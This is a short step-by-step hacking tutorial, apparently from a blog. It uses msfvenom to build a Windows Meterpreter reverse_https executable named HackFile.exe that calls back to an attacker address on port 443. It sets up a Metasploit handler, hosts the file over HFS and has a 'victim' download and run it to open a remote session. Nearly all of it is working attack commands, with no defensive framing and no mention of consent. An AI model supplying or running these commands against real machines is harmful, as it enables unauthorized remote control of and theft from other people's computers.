Metasploits Web Delivery Script is a versatile module that creates a server on the attacking machine which hosts a payload. When the victim connects to the attacking server, the payload will be executed on the victim machine.
The communication between the payload and the framework takes place over the HTTPS protocol, where the handler functions as some kind of a special "web server", a smart, special web server.
Step 1 : Here lport is 443 [HTTPS Port]
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.18.132 lport=443 -f exe > /root/Desktop/HackFile.exe
Step 2 : Open MetaSploit by using command msfconsole
Step 3 :
msf > use exploit/multi/handler
msf exploit (handler)>set payload windows/meterpreter/reverse_https
msf exploit (handler)>set lhost 192.168.18.132
msf exploit (handler)>set lport 443
msf exploit (handler)>run
Step 4 : Share a file with HFS (HTTP file Sever)
HFS(HTTP file Sever) is default installed in Latest kali linux,if not installed,visit our article
How to send or receive files in Kali Linux - Using HFS(HTTP File Server)
Step 5 : Open the Kali Linux ip on victim PC (Window PC/target PC) in browser.
Download the file and run it.
Step 6 : When you run the file on victim PC ,they will be Hacked by you on Kali Linux(Sessions will come on terminal)
A meterpreter session open!